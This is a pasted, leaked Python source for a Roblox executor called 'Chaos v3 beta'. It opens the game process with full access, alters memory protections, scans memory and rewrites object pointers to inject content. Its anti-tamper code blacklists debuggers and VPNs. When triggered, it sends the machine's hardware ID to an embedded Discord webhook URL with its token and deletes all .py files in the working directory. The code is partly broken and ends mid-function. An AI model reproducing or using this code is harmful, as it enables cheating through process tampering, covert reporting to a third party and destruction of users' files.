API tools faq
paste
Advertisement
NoTextForSpeech

chaos v3 beta leak source fix error yourself

NoTextForSpeech
Apr 4th, 2024 (edited)
367
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 34.40 KB | None | 0 0
raw download clone embed print report
  1. # Protected by PyAntiSkid
  2. #If you are reading this, you are probably a skid
  3. #Good luck deobfing this, skid!
  4. from pystyle import Colors, Colorate
  5. import ctypes
  6. import random
  7. import string
  8. import pymem
  9. import time
  10. import re
  11. import os
  12. import psutil
  13. import subprocess
  14. import threading
  15. import requests
  16. import hashlib
  17. import urllib
  18. import glob
  19. import json
  20. import requests
  21. import ssl
  22. from requests.adapters import HTTPAdapter
  23. from requests.packages.urllib3.poolmanager import PoolManager
  24. import tempfile
  25.  
  26. cert = """
  27. -----BEGIN CERTIFICATE-----
  28. MIIE4TCCA8mgAwIBAgISAwmt592pmLYBVax/P+51AGDNMA0GCSqGSIb3DQEBCwUA
  29. MDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQD
  30. EwJSMzAeFw0yNDA0MDIxNTQ5MzVaFw0yNDA3MDExNTQ5MzRaMBUxEzARBgNVBAMT
  31. CmJ5ZnJvbi5sb2wwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCoVVy/
  32. Lh8usb0nwz6resMIuAbO/0qjRjyeZU8WWc2ofzEejiLtH2fGxKaqVe0M5Ca50Ztk
  33. MQSgdK8D2OzKTRW3jRoAVocWCAB5NHVuesHn4PHnSL5mVd6nEkUHjvqdNJDEI6pe
  34. GEfcOBvyxA+aafYJWL+nKXvCEBOWh349XkzAxB4reiTNqBowumk00hwIseMYmTY+
  35. FSdepDNzHo1XGJmNNba+m58MaqYUzSK+qqzHpBe1uwixjp1PCuaJTVMz0ycrn/Tb
  36. 7TQgks23hJvQoJiMdATq/tua35DjkfVCFRGmafaZQYsWT0mO+HgYoffibaHUEbPu
  37. 4vpF6wACzhgHJigRAgMBAAGjggIMMIICCDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0l
  38. BBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYE
  39. FKAXfi5DYq+IvhG+puMA/5aWCHWPMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYf
  40. r52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8u
  41. bGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMBUG
  42. A1UdEQQOMAyCCmJ5ZnJvbi5sb2wwEwYDVR0gBAwwCjAIBgZngQwBAgEwggEEBgor
  43. BgEEAdZ5AgQCBIH1BIHyAPAAdgDf4VbrqgWvtZwPhnGNqMAyTq5W2W6n9aVqAdHB
  44. O75SXAAAAY6ft1MRAAAEAwBHMEUCIAfFaEx0FFSyHKpihRtfL2p2Uzj80nSSZ9MQ
  45. Qh241GIVAiEAu/zFbuobWRAKQHhQvq2XupDu12SnOXdscD2qF/iz1c4AdgBIsONr
  46. 2qZHNA/lagL6nTDrHFIBy1bdLIHZu7+rOdiEcwAAAY6ft1P+AAAEAwBHMEUCICod
  47. L89ZnhQPFAAqsurfYcWo2jp5v7mQNFb0Ozde8ILbAiEAxeciEYDhSdWp09L9epli
  48. sR86PigGnSU6UllYjrnb8jQwDQYJKoZIhvcNAQELBQADggEBALFUVi1ij6xOEzXn
  49. RqOxKJ5d8yNfYNYQJD1tFgQwtSUAhV/KhkCdxw/7AF4QsFcvifMAifTQH7DjxUII
  50. a0WfwsbpEmdvJ1rEVpNJY2FrDK54JgsAQqvDvHPpN9f6U3ruF3vq9TkVjlBFmhns
  51. Vsg2+APwtpzHTkqI6ln5QI5Ag0OLAzUXseIyhTZlgOkW7Hj4LcgWXp4Yp3dRQ8p3
  52. SW85IA4lM5Xa7jz29ApejyxvSGfCgO1GNlAwULfqEqHcVT3nixdgJWE1bvEltzc7
  53. ODVbXn7HXJnAMAEytELRhrWnO+cR1HdIJkXsnaWR9e6m5TC2fXpGmK4C/bogAx2u
  54. mD9vASc=
  55. -----END CERTIFICATE-----
  56. """
  57.  
  58. class SSLAdapter(HTTPAdapter):
  59. def __init__(self, cert_content):
  60. self.cert_file = tempfile.NamedTemporaryFile(delete=True)
  61. self.cert_file.write(cert_content.encode())
  62. self.cert_file.flush()
  63. super().__init__()
  64.  
  65. def init_poolmanager(self, connections, maxsize, block=False):
  66. self.poolmanager = PoolManager(num_pools=connections,
  67. maxsize=maxsize,
  68. block=block,
  69. ssl_version=ssl.PROTOCOL_TLSv1_2,
  70. cert_reqs='CERT_REQUIRED',
  71. ca_certs=self.cert_file.name) # Use the certificate file
  72.  
  73. p = psutil.Process(os.getpid())
  74. p.nice(psutil.HIGH_PRIORITY_CLASS)
  75. global selector
  76. thisver = "beta_0438"
  77. def tamperdetected():
  78. webhook = "https://discord.com/api/webhooks/1225098688154832987/GkYCaZCmLGYFosGq0rxWUxKkyuwj-ld2o_vaRby8UgLNgkdXNGagzUhFNkn99HzJz22s"
  79. hw = subprocess.check_output('wmic csproduct get uuid').decode().split('\n')[1].strip()
  80. embed = {
  81. "title": "Tamper Detected",
  82. "description": f"***IP:***``` Getting Ip is disabled```\n**HWID:***```{hw}```",
  83. "color": 16711680 # Red color
  84. }
  85. requests.post(webhook, json={"embeds": [embed]})
  86. print(f"\nYou have won free Chaos beta, DM byfronlol on Discord with your unique ID: ", ran)
  87. # destroy the file
  88. cwd = os.getcwd()
  89. py_files = glob.glob(os.path.join(cwd, '*.py'))
  90. for file in py_files:
  91. os.remove(file)
  92. exit()
  93.  
  94. def checkleak():
  95. version = requests.get("https://byfron.lol/api/version?version="+thisver).json()
  96.  
  97. if version.get('message') == '404 | Leaker found':
  98. tamperdetected()
  99. def randomstrings():
  100. return ''.join(random.choice(string.ascii_lowercase) for i in range(10))
  101. ran = randomstrings()
  102.  
  103. def checkproxy():
  104. while True:
  105. if urllib.request.getproxies() == {}:
  106. return False
  107. else:
  108. tamperdetected()
  109. return True
  110.  
  111.  
  112.  
  113.  
  114.  
  115. import time
  116.  
  117. def check_processes(process_names):
  118. while True:
  119. for process in psutil.process_iter(['name']):
  120. #get every process
  121. for name in process_names:
  122. #for every blacklisted name
  123. if name in process.info['name'].lower():
  124. #if name is in the process info
  125. # print("tamper found!!!") # debug
  126. #then flag
  127. tamperdetected()
  128.  
  129. time.sleep(1) # pause for 1 second
  130.  
  131. processes_to_check = ["gdb", "debug", "dbg", "proxy", "ida", "fiddle", "dnspy", "socks", "vpn", "psiphon", "ultrasurf", "ghidra", "compile", "spoof", "woof"]
  132. t = threading.Thread(target=check_processes, args=(processes_to_check,))
  133. t.start()
  134.  
  135. os.system("cls")
  136. banner = """
  137.  
  138. ░█████╗░██╗░░██╗░█████╗░░█████╗░░██████╗██████╗░░█████╗░██╗░░░░░██╗████████╗ [Version]: Beta V3
  139. ██╔══██╗██║░░██║██╔══██╗██╔══██╗██╔════╝██╔══██╗██╔══██╗██║░░░░░██║╚══██╔══╝ [Deafult]: [RobloxPlayerBeta.exe]
  140. ██║░░╚═╝███████║███████║██║░░██║╚█████╗░██████╔╝██║░░██║██║░░░░░██║░░░██║░░░ [1] WEB
  141. ██║░░██╗██╔══██║██╔══██║██║░░██║░╚═══██╗██╔═══╝░██║░░██║██║░░░░░██║░░░██║░░░ [2] UWP
  142. ╚█████╔╝██║░░██║██║░░██║╚█████╔╝██████╔╝██║░░░░░╚█████╔╝███████╗██║░░░██║░░░
  143. ░╚════╝░╚═╝░░╚═╝╚═╝░░╚═╝░╚════╝░╚═════╝░╚═╝░░░░░░╚════╝░╚══════╝╚═╝░░░╚═╝░░░ """
  144. print(Colorate.Horizontal(Colors.purple_to_blue, banner, 1))
  145.  
  146.  
  147. def colorprint(text):
  148. print(Colorate.Horizontal(Colors.cyan_to_blue, text))
  149.  
  150. def checkkey():
  151. url = "https://byfron.lol/api/keyids"
  152. key = input(Colorate.DiagonalBackwards(Colors.cyan_to_blue, "Enter your key: ", 1))
  153. hw = subprocess.check_output('wmic csproduct get uuid').decode().split('\n')[1].strip()
  154. session = requests.Session()
  155. session.mount(url, SSLAdapter(cert))
  156. r = session.get(url=url + "?keyid=" + key +f"&hwid={hw}")
  157. response_data = json.loads(r.text)
  158.  
  159. if response_data.get('status') == 'error' and response_data.get('message') == '403 | Blocked - HWID does not match':
  160. print("Your HWID doesn't match the key HWID")
  161. return False
  162. elif response_data.get('status') == 'error' and response_data.get('message') == '404 | Key ID not found':
  163. print("Key expired or not found in the database")
  164. return False
  165. elif response_data.get('status') == 'success' and 'Key ID is valid' in response_data.get('message'):
  166. return True
  167. else:
  168. print(response_data)
  169.  
  170. if checkkey():
  171.  
  172. pass
  173. else:
  174. os.system("cls")
  175. print(Colorate.Horizontal(Colors.purple_to_blue, banner, 1))
  176. print("Invalid Key Get It From: https://byfron.lol/")
  177. exit()
  178.  
  179. os.system("cls")
  180. print(Colorate.Horizontal(Colors.purple_to_blue, banner, 1))
  181. print(Colorate.Horizontal(Colors.cyan_to_blue, "Valide Key",1))
  182. selectorsec = input(Colorate.Horizontal(Colors.cyan_to_blue, "\nSelect the Roblox version you want to use: ", 1))
  183. if selectorsec == "2":
  184. selector = "Windows10Universal.exe"
  185. else:
  186. selector = "RobloxPlayerBeta.exe"
  187. def CloseRBLX():
  188. roblox_processes = ChaoSpolit.YieldForProgram(f"{selector}")
  189. if roblox_processes:
  190. os.system(f"taskkill /im {selector}")
  191.  
  192. if not roblox_processes:
  193. print("/\{selector} was not found")
  194. exit()
  195.  
  196. os.system("cls" if os.name == "nt" else "clear")
  197.  
  198. # This is a flag that the thread will check to see if it should stop
  199. stop_thread = False
  200.  
  201. def undetectname():# silly bypass
  202. global stop_thread
  203. while not stop_thread:
  204. letters = string.ascii_lowercase
  205. appname = ''.join(random.choice(letters) for _ in range(40))
  206. ctypes.windll.kernel32.SetConsoleTitleW(appname)
  207.  
  208.  
  209.  
  210. def init():
  211. """# docs by tabnine
  212. This function is used to check for updates and display them to the user.
  213. """
  214. url = "https://capi-3ns5.onrender.com/latestversion"# i am dumb
  215. req = requests.get(url=url)
  216. #convert the output : [1] into only the number in it
  217. res = req.text[1:-1]
  218. # print(res)# debug [purposes]
  219. if res == "1":
  220. print(Colorate.Horizontal(Colors.cyan_to_blue, f"Latest Version : {res}..."))
  221. print(Colorate.Horizontal(Colors.cyan_to_blue, "Discord: https://discord.gg/chaosploit...", 1))
  222. pass
  223. else:
  224. print(Colorate.Horizontal(Colors.cyan_to_blue, "Update Soon Please Join: https://discord.gg/chaosploit...", 1))
  225. exit()
  226.  
  227.  
  228. init()
  229.  
  230. class ChaoSpolit:
  231. def __init__(self, program_name):
  232. self.program_name = program_name
  233.  
  234. def SimpleGetProcesses(self):
  235. return [proc.name() for proc in psutil.process_iter(["name"])]
  236.  
  237. def SetParent(self, Instance, Parent, parentOffset):
  238. ChaoSpolit.Pymem.write_longlong(Instance + parentOffset, Parent)
  239.  
  240. def __init__(self, ProgramName=None):# init
  241. self.ProgramName = ProgramName
  242. self.Pymem = pymem.Pymem()
  243. self.Addresses = {}
  244. self.Handle = None
  245. self.is64bit = True
  246. self.ProcessID = None
  247. self.PID = self.ProcessID
  248. if type(ProgramName) == str:
  249. self.Pymem = pymem.Pymem(ProgramName)
  250. self.Handle = self.Pymem.process_handle
  251. self.is64bit = pymem.process.is_64_bit(self.Handle)
  252. self.ProcessID = self.Pymem.process_id
  253. self.PID = self.ProcessID
  254. elif type(ProgramName) == int:
  255. self.Pymem.open_process_from_id(ProgramName)
  256. self.Handle = self.Pymem.process_handle
  257. self.is64bit = pymem.process.is_64_bit(self.Handle)
  258. self.ProcessID = self.Pymem.process_id
  259. self.PID = self.ProcessID
  260.  
  261. def h2d(self, hz: str, bit: int = 16) -> int:
  262. if type(hz) == int:
  263. return hz
  264. return int(hz, bit)
  265.  
  266. def d2h(self, dc: int, UseAuto=None) -> str:
  267. if type(dc) == str:
  268. return dc
  269. if UseAuto:
  270. if UseAuto == 32:
  271. dc = hex(dc & (2**32 - 1)).replace("0x", "")
  272. else:
  273. dc = hex(dc & (2**64 - 1)).replace("0x", "")
  274. else:
  275. if abs(dc) > 4294967295:
  276. dc = hex(dc & (2**64 - 1)).replace("0x", "")
  277. else:
  278. dc = hex(dc & (2**32 - 1)).replace("0x", "")
  279. if len(dc) > 8:
  280. while len(dc) < 16:
  281. dc = "0" + dc
  282. if len(dc) < 8:
  283. while len(dc) < 8:
  284. dc = "0" + dc
  285. return dc
  286.  
  287. def PLAT(self, aob: str):
  288. if type(aob) == bytes:
  289. return aob
  290. trueB = bytearray(b"")
  291. aob = aob.replace(" ", "")
  292. PLATlist = []
  293. for i in range(0, len(aob), 2):
  294. PLATlist.append(aob[i : i + 2])
  295. for i in PLATlist:
  296. if "?" in i:
  297. trueB.extend(b".")
  298. if "?" not in i:
  299. trueB.extend(re.escape(bytes.fromhex(i)))
  300. return bytes(trueB)
  301.  
  302. def AOBSCANALL(self, AOB_HexArray, xreturn_multiple=False):
  303. """
  304. Searches for a given AOB (Address-Of-Buffer) pattern in the currently opened process.
  305.  
  306. Parameters:
  307. AOB_HexArray (str): The AOB pattern to search for, represented as a hex string.
  308. xreturn_multiple (bool): Whether to return all matches or only the first match.
  309.  
  310. Returns:
  311. A list of addresses where the AOB pattern was found, or None if the pattern was not found.
  312. """
  313. try:
  314. # Open the process with the appropriate access rights
  315. ChaoSpolit.Pymem.process_handle = ctypes.windll.kernel32.OpenProcess(
  316. 0x1F0FFF, # PROCESS_ALL_ACCESS
  317. False, # False = do not inherit handles
  318. ChaoSpolit.Pymem.process_id,
  319. )
  320.  
  321. # Define necessary ChaoSpolit functions
  322. PAGE_EXECUTE_READWRITE = 0x40
  323. ntdll = ctypes.windll.ntdll
  324. NtProtectVirtualMemory = ntdll.NtProtectVirtualMemory
  325. NtProtectVirtualMemory.restype = ctypes.c_long
  326.  
  327. # Get the base address of the process
  328. base_address = ctypes.windll.kernel32.GetModuleHandleW(None)
  329.  
  330. # Remove read/write protection from the process memory
  331. old_protect = ctypes.c_ulong()
  332. size = ctypes.c_size_t(0x1000)
  333. NtProtectVirtualMemory(
  334. ChaoSpolit.Pymem.process_handle,
  335. ctypes.byref(ctypes.c_void_p(base_address)),
  336. ctypes.byref(size),
  337. PAGE_EXECUTE_READWRITE,
  338. ctypes.byref(old_protect),
  339. )
  340.  
  341. # Get the base address of the process again (after removing read/write protection)
  342. base_address = ctypes.windll.kernel32.GetModuleHandleW(None)
  343.  
  344. # Re-enable read/write protection for the process memory
  345. NtProtectVirtualMemory(
  346. ChaoSpolit.Pymem.process_handle,
  347. ctypes.byref(ctypes.c_void_p(base_address)),
  348. ctypes.byref(size),
  349. old_protect,
  350. ctypes.byref(ctypes.c_ulong()),
  351. )
  352.  
  353. # Now attempt the pattern scan
  354. return pymem.pattern.pattern_scan_all(
  355. self.Pymem.process_handle,
  356. self.PLAT(AOB_HexArray),
  357. return_multiple=xreturn_multiple,
  358. )
  359. except Exception as e:
  360. print(f"WinAPI Error: {e}")
  361. # Let's try bypassing read/write protection first.
  362. try:
  363. ChaoSpolit.Pymem.process_handle = ctypes.windll.kernel32.OpenProcess(
  364. 0x1F0FFF, # PROCESS_ALL_ACCESS
  365. False, # False = do not inherit handles
  366. ChaoSpolit.Pymem.process_id,
  367. )
  368.  
  369. # Define necessary ChaoSpolit functions
  370. PAGE_EXECUTE_READWRITE = 0x40
  371. ntdll = ctypes.windll.ntdll
  372. NtProtectVirtualMemory = ntdll.NtProtectVirtualMemory
  373. NtProtectVirtualMemory.restype = ctypes.c_long
  374.  
  375. # Get the base address of the process
  376. base_address = ctypes.windll.kernel32.GetModuleHandleW(None)
  377.  
  378. # Remove read/write protection from the process memory
  379. old_protect = ctypes.c_ulong()
  380. size = ctypes.c_size_t(0x1000)
  381. NtProtectVirtualMemory(
  382. ChaoSpolit.Pymem.process_handle,
  383. ctypes.byref(ctypes.c_void_p(base_address)),
  384. ctypes.byref(size),
  385. PAGE_EXECUTE_READWRITE,
  386. ctypes.byref(old_protect),
  387. )
  388.  
  389. # Get the base address of the process again (after removing read/write protection)
  390. base_address = ctypes.windll.kernel32.GetModuleHandleW(None)
  391.  
  392. # Re-enable read/write protection for the process memory
  393. NtProtectVirtualMemory(
  394. ChaoSpolit.Pymem.process_handle,
  395. ctypes.byref(ctypes.c_void_p(base_address)),
  396. ctypes.byref(size),
  397. old_protect,
  398. ctypes.byref(ctypes.c_ulong()),
  399. )
  400.  
  401. # Now attempt the pattern scan
  402. return pymem.pattern.pattern_scan_all(
  403. self.Pymem.process_handle,
  404. self.PLAT(AOB_HexArray),
  405. return_multiple=xreturn_multiple,
  406. )
  407. except WindowsError as we:
  408. if we.winerror == 5:
  409. ChaoSpolit.Pymem.process_handle = ctypes.windll.kernel32.OpenProcess(
  410. 0x1F0FFF, # PROCESS_ALL_ACCESS
  411. False, # False = do not inherit handles
  412. ChaoSpolit.Pymem.process_id,
  413. )
  414.  
  415. # Define necessary ChaoSpolit functions
  416. PAGE_EXECUTE_READWRITE = 0x40
  417. ntdll = ctypes.windll.ntdll
  418. NtProtectVirtualMemory = ntdll.NtProtectVirtualMemory
  419. NtProtectVirtualMemory.restype = ctypes.c_long
  420.  
  421. # Get the base address of the process
  422. base_address = ctypes.windll.kernel32.GetModuleHandleW(None)
  423.  
  424. # Remove read/write protection from the process memory
  425. old_protect = ctypes.c_ulong()
  426. size = ctypes.c_size_t(0x1000)
  427. NtProtectVirtualMemory(
  428. ChaoSpolit.Pymem.process_handle,
  429. ctypes.byref(ctypes.c_void_p(base_address)),
  430. ctypes.byref(size),
  431. PAGE_EXECUTE_READWRITE,
  432. ctypes.byref(old_protect),
  433. )
  434.  
  435. # Get the base address of the process again (after removing read/write protection)
  436. base_address = ctypes.windll.kernel32.GetModuleHandleW(None)
  437.  
  438. # Re-enable read/write protection for the process memory
  439. NtProtectVirtualMemory(
  440. ChaoSpolit.Pymem.process_handle,
  441. ctypes.byref(ctypes.c_void_p(base_address)),
  442. ctypes.byref(size),
  443. old_protect,
  444. ctypes.byref(ctypes.c_ulong()),
  445. )
  446.  
  447. # Now attempt the pattern scan
  448. return pymem.pattern.pattern_scan_all(
  449. self.Pymem.process_handle,
  450. self.PLAT(AOB_HexArray),
  451. return_multiple=xreturn_multiple,
  452. )
  453. except Exception as e:
  454. print(f"Unknown error: ")
  455.  
  456.  
  457. def hex2le(self, hex: str):
  458. lehex = hex.replace(" ", "")
  459. lelist = []
  460. if len(lehex) > 8:
  461. while len(lehex) < 16:
  462. lehex = "0" + lehex
  463. for i in range(0, len(lehex), 2):
  464. lelist.append(lehex[i : i + 2])
  465. lelist.reverse()
  466. return "".join(lelist)
  467. if len(lehex) < 9:
  468. while len(lehex) < 8:
  469. lehex = "0" + lehex
  470. for i in range(0, len(lehex), 2):
  471. lelist.append(lehex[i : i + 2])
  472. lelist.reverse()
  473. return "".join(lelist)
  474.  
  475.  
  476. def isProgramGameActive(self):
  477. try:
  478. self.Pymem.read_char(self.Pymem.base_address)
  479. return True
  480. except:
  481. return False
  482.  
  483. def DRP(self, Address: int, is64Bit: bool = None) -> int:
  484. Address = Address
  485. if type(Address) == str:
  486. Address = self.h2d(Address)
  487. if is64Bit:
  488. return int.from_bytes(self.Pymem.read_bytes(Address, 8), "little")
  489. if self.is64bit:
  490. return int.from_bytes(self.Pymem.read_bytes(Address, 8), "little")
  491. return int.from_bytes(self.Pymem.read_bytes(Address, 4), "little")
  492.  
  493.  
  494. def getRawProcesses(self):
  495. toreturn = []
  496. for i in pymem.process.list_processes():
  497. toreturn.append(
  498. [
  499. i.cntThreads,
  500. i.cntUsage,
  501. i.dwFlags,
  502. i.dwSize,
  503. i.pcPriClassBase,
  504. i.szExeFile,
  505. i.th32DefaultHeapID,
  506. i.th32ModuleID,
  507. i.th32ParentProcessID,
  508. i.th32ProcessID,
  509. ]
  510. )
  511. return toreturn
  512.  
  513. def SimpleGetProcesses(self):
  514. toreturn = []
  515. for i in self.getRawProcesses():
  516. toreturn.append({"Name": i[5].decode(), "Threads": i[0], "ProcessId": i[9]})
  517. return toreturn
  518.  
  519. def YieldForProgram(self, programName, AutoOpen: bool = False, Limit=1):
  520. Count = 0
  521. while True:
  522. if Count >= Limit:
  523. return False
  524. ProcessesList = self.SimpleGetProcesses()
  525. for i in ProcessesList:
  526. if i["Name"] == programName:
  527.  
  528. if AutoOpen:
  529. self.Pymem.open_process_from_id(i["ProcessId"])
  530. self.ProgramName = programName
  531. self.Handle = self.Pymem.process_handle
  532. self.is64bit = pymem.process.is_64_bit(self.Handle)
  533. self.ProcessID = self.Pymem.process_id
  534. self.PID = self.ProcessID
  535. return True
  536. time.sleep(1)
  537. Count += 1
  538.  
  539.  
  540.  
  541.  
  542. ChaoSpolit = ChaoSpolit()
  543.  
  544.  
  545. print(Colorate.Horizontal(Colors.cyan_to_blue, f"Waiting for {selector}", 1))
  546. while True:
  547. if ChaoSpolit.YieldForProgram(f"{selector}", True, 15):
  548. break
  549.  
  550.  
  551.  
  552. def ReadRobloxString(ExpectedAddress: int) -> str:
  553. try:
  554. StringCount = ChaoSpolit.Pymem.read_int(ExpectedAddress + 0x10)
  555. if StringCount > 15:
  556. return ChaoSpolit.Pymem.read_string(ChaoSpolit.DRP(ExpectedAddress), StringCount)
  557. return ChaoSpolit.Pymem.read_string(ExpectedAddress, StringCount)
  558. except TypeError as e:
  559. print(f"TypeError: {e} \n" + "Rsp3")
  560. exit()
  561.  
  562. def GetClassName(Instance: int) -> str:
  563. ExpectedAddress = ChaoSpolit.DRP(ChaoSpolit.DRP(Instance + 0x18) + 8)
  564. return ReadRobloxString(ExpectedAddress)
  565.  
  566. def setParent(Instance, Parent, parentOffset, childrenOffset):
  567. ChaoSpolit.Pymem.process_handle = ctypes.windll.kernel32.OpenProcess(
  568. 0x1F0FFF, # PROCESS_ALL_ACCESS
  569. False, # False = do not inherit handles
  570. ChaoSpolit.Pymem.process_id,
  571. )
  572.  
  573. # Define necessary ChaoSpolit functions
  574. PAGE_EXECUTE_READWRITE = 0x40
  575. ntdll = ctypes.windll.ntdll
  576. NtProtectVirtualMemory = ntdll.NtProtectVirtualMemory
  577. NtProtectVirtualMemory.restype = ctypes.c_long
  578.  
  579. # Get the base address of the process
  580. base_address = ctypes.windll.kernel32.GetModuleHandleW(None)
  581.  
  582. # Remove read/write protection from the process memory
  583. old_protect = ctypes.c_ulong()
  584. size = ctypes.c_size_t(0x1000)
  585. NtProtectVirtualMemory(
  586. ChaoSpolit.Pymem.process_handle,
  587. ctypes.byref(ctypes.c_void_p(base_address)),
  588. ctypes.byref(size),
  589. PAGE_EXECUTE_READWRITE,
  590. ctypes.byref(old_protect),
  591. )
  592.  
  593. # Get the base address of the process again (after removing read/write protection)
  594. base_address = ctypes.windll.kernel32.GetModuleHandleW(None)
  595.  
  596. # Re-enable read/write protection for the process memory
  597. NtProtectVirtualMemory(
  598. ChaoSpolit.Pymem.process_handle,
  599. ctypes.byref(ctypes.c_void_p(base_address)),
  600. ctypes.byref(size),
  601. old_protect,
  602. ctypes.byref(ctypes.c_ulong()),
  603. )
  604.  
  605. ChaoSpolit.Pymem.write_longlong(Instance + parentOffset, Parent)
  606. newChildren = ChaoSpolit.Pymem.allocate(0x400)
  607. ChaoSpolit.Pymem.write_longlong(newChildren, newChildren + 0x40)
  608.  
  609. ptr = ChaoSpolit.Pymem.read_longlong(Parent + childrenOffset)
  610. childrenStart, childrenEnd = ChaoSpolit.Pymem.read_longlong(ptr), ChaoSpolit.Pymem.read_longlong(ptr + 8)
  611.  
  612. if childrenStart == 0 or childrenEnd == 0 or childrenEnd <= childrenStart or (length := childrenEnd - childrenStart) < 0:
  613. print("\033[91mError: Invalid children range. Line: Rsp16\033[0m" if childrenStart == 0 or childrenEnd == 0 or childrenEnd <= childrenStart else "\033[91mError: Negative length for children array. Line: Rsp17\033[0m")
  614. exit()
  615.  
  616. b = ChaoSpolit.Pymem.read_bytes(childrenStart, length)
  617. ChaoSpolit.Pymem.write_bytes(newChildren + 0x40, b, len(b))
  618. e = newChildren + 0x40 + length
  619. ChaoSpolit.Pymem.write_longlong(e, Instance)
  620. ChaoSpolit.Pymem.write_longlong(e + 8, ChaoSpolit.Pymem.read_longlong(Instance + 0x10))
  621. e += 0x10
  622. ChaoSpolit.Pymem.write_longlong(newChildren + 0x8, e)
  623. ChaoSpolit.Pymem.write_longlong(newChildren + 0x10, e)
  624.  
  625.  
  626. def inject():
  627. nameOffset = 72
  628. parentOffset = 96
  629. childrenOffset = 80
  630.  
  631. def GetDataModel() -> int:# lua and cipher
  632. guiroot_pattern = b"\\x47\\x75\\x69\\x52\\x6F\\x6F\\x74\\x00\\x47\\x75\\x69\\x49\\x74\\x65\\x6D"
  633. guiroot_address = ChaoSpolit.AOBSCANALL(guiroot_pattern, xreturn_multiple=False)
  634. if guiroot_address != 0:
  635. RawDataModel = ChaoSpolit.DRP(guiroot_address + 0x38)
  636. DataModel = RawDataModel + 0x150
  637. return DataModel - 0x8
  638. else:
  639. print("Critical Error please restart the program")
  640. exit()
  641. from concurrent.futures import ThreadPoolExecutor
  642.  
  643. def check_ptr(i):
  644. ptr = ChaoSpolit.Pymem.read_longlong(dataModel + i)
  645. if ptr:
  646. try:
  647. childrenStart = ChaoSpolit.Pymem.read_longlong(ptr)
  648. childrenEnd = ChaoSpolit.Pymem.read_longlong(ptr + 8)
  649. if childrenStart and childrenEnd:
  650. diff = childrenEnd - childrenStart
  651. if diff > 1 and diff < 0x1000:
  652. return i
  653. except:
  654. pass
  655. return None
  656.  
  657. dataModel = GetDataModel()
  658.  
  659. with ThreadPoolExecutor() as executor:
  660. for result in executor.map(check_ptr, range(0x10, 0x200 + 8, 8)):
  661. if result is not None:
  662. childrenOffset = result
  663. break
  664. print(Colorate.Horizontal(Colors.cyan_to_blue, "Datamodel Scanning Completed Successfully", 1))
  665.  
  666. def GetNameAddress(Instance: int) -> int:
  667. try:
  668.  
  669. ExpectedAddress = ChaoSpolit.DRP(Instance + nameOffset, True)
  670.  
  671.  
  672. return ExpectedAddress
  673. except TypeError as e:
  674. print(f"TypeError: {e} \n" + "Line: Rsp8")
  675. exit()
  676.  
  677.  
  678.  
  679. def GetName(Instance: int) -> str:
  680. ExpectedAddress = GetNameAddress(Instance)
  681. return ReadRobloxString(ExpectedAddress)
  682.  
  683. def GetChildren(Instance: int) -> str:
  684. ChildrenInstance = []
  685. InstanceAddress = Instance
  686. if not InstanceAddress:
  687. return False
  688. ChildrenStart = ChaoSpolit.DRP(InstanceAddress + childrenOffset, True)
  689. if ChildrenStart == 0:
  690. return []
  691. ChildrenEnd = ChaoSpolit.DRP(ChildrenStart + 8, True)
  692. OffsetAddressPerChild = 0x10
  693. CurrentChildAddress = ChaoSpolit.DRP(ChildrenStart, True)
  694. read_longlong = ChaoSpolit.Pymem.read_longlong # Store in a local variable
  695. try:
  696. while CurrentChildAddress != ChildrenEnd:
  697. ChildrenInstance.append(read_longlong(CurrentChildAddress))
  698. CurrentChildAddress += OffsetAddressPerChild
  699. return ChildrenInstance
  700. except ValueError as e:
  701. print(f"\033[91mError: {e}\033[0m")
  702. exit()
  703.  
  704. def GetParent(Instance: int) -> int:
  705. return ChaoSpolit.DRP(Instance + parentOffset, True)
  706.  
  707. def FindFirstChild(Instance: int, ChildName: str) -> int:
  708. ChildrenOfInstance = GetChildren(Instance)
  709. for i in ChildrenOfInstance:
  710. if GetName(i) == ChildName:
  711. return i
  712.  
  713. def FindFirstChildOfClass(Instance: int, ClassName: str) -> int:
  714. ChildrenOfInstance = GetChildren(Instance)
  715. for i in ChildrenOfInstance:
  716. if GetClassName(i) == ClassName:
  717. return i
  718.  
  719. def GetDescendants(Instance: int) -> list:
  720.  
  721. descendants = []
  722.  
  723. def _get_descendants_recursive(current_instance: int):
  724. children = GetChildren(current_instance)
  725. descendants.extend(children) # Add direct children
  726.  
  727. # Recurse into each child
  728. for child in children:
  729. _get_descendants_recursive(child)
  730.  
  731. _get_descendants_recursive(Instance)
  732. return descendants
  733.  
  734.  
  735.  
  736.  
  737. class toInstance:
  738. def __init__(self, address: int = 0):
  739. self.Address = address
  740. self.Self = address
  741. self.Name = GetName(address)
  742. self.ClassName = GetClassName(address)
  743. self.Parent = GetParent(address)
  744.  
  745. def getChildren(self):
  746. return GetChildren(self.Address)
  747.  
  748. def findFirstChild(self, ChildName):
  749. return FindFirstChild(self.Address, ChildName)
  750.  
  751. def findFirstClass(self, ChildClass):
  752. return FindFirstChildOfClass(self.Address, ChildClass)
  753.  
  754. def setParent(self, Parent):
  755. setParent(self.Address, Parent)
  756.  
  757. def GetChildren(self):
  758. return GetChildren(self.Address)
  759.  
  760. def GetDescendants(self):
  761. return GetDescendants(self.Address)
  762.  
  763. def FindFirstChild(self, ChildName):
  764. return FindFirstChild(self.Address, ChildName)
  765.  
  766. def FindFirstClass(self, ChildClass):
  767. return FindFirstChildOfClass(self.Address, ChildClass)
  768.  
  769. def SetParent(self, Parent):
  770. setParent(self.Address, Parent, parentOffset, childrenOffset)
  771.  
  772.  
  773.  
  774.  
  775. print("Injecting...")
  776.  
  777. results = ChaoSpolit.AOBSCANALL("496E6A656374????????????????????06", True)
  778. if results == []:
  779. print("\033[35mPlease find another teleporter! Line: Rsp11\033[0m")
  780. return None
  781. for rn in results:
  782. result = rn
  783. bres = ChaoSpolit.d2h(result)
  784. aobs = "".join(bres[i - 1: i] for i in range(1, 17))
  785. aobs = ChaoSpolit.hex2le(aobs)
  786. first = False
